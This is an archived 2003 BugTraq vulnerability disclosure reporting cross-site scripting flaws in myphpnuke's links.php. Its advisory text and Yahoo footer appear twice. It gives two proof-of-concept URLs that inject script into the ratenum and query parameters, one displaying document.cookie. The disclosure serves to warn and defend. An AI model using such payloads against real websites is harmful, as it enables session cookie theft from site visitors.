BugTraq
Back to list
|
Post reply
myphpnuke xss
Feb 20 2003 01:40AM
Tacettin Karadeniz (tacettinkaradeniz yahoo com)
Vendor:
http://www.myphpnuke.com
Subject:
myphpnuke links.php vulnerability
myphpnuke is a website portal tool written in php.
There are many Cross Site Scripting issue on myphpnuke
.
Example:
http://WEB/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(docu
ment.cookie);[/scr!pt]&ratetype=percent
http://WEB/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettin@o
lympos.org');[/scr!pt]?query=
__________________________________________________
Do you Yahoo!?
Yahoo! Shopping - Send Flowers for Valentine's Day
http://shopping.yahoo.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://www.myphpnuke.com
Subject:
myphpnuke links.php vulnerability
myphpnuke is a website portal tool written in php.
There are many Cross Site Scripting issue on myphpnuke
.
Example:
http://WEB/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(docu
ment.cookie);[/scr!pt]&ratetype=percent
http://WEB/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettin@o
lympos.org');[/scr!pt]?query=
__________________________________________________
Do you Yahoo!?
Yahoo! Shopping - Send Flowers for Valentine's Day
http://shopping.yahoo.com
[ reply ]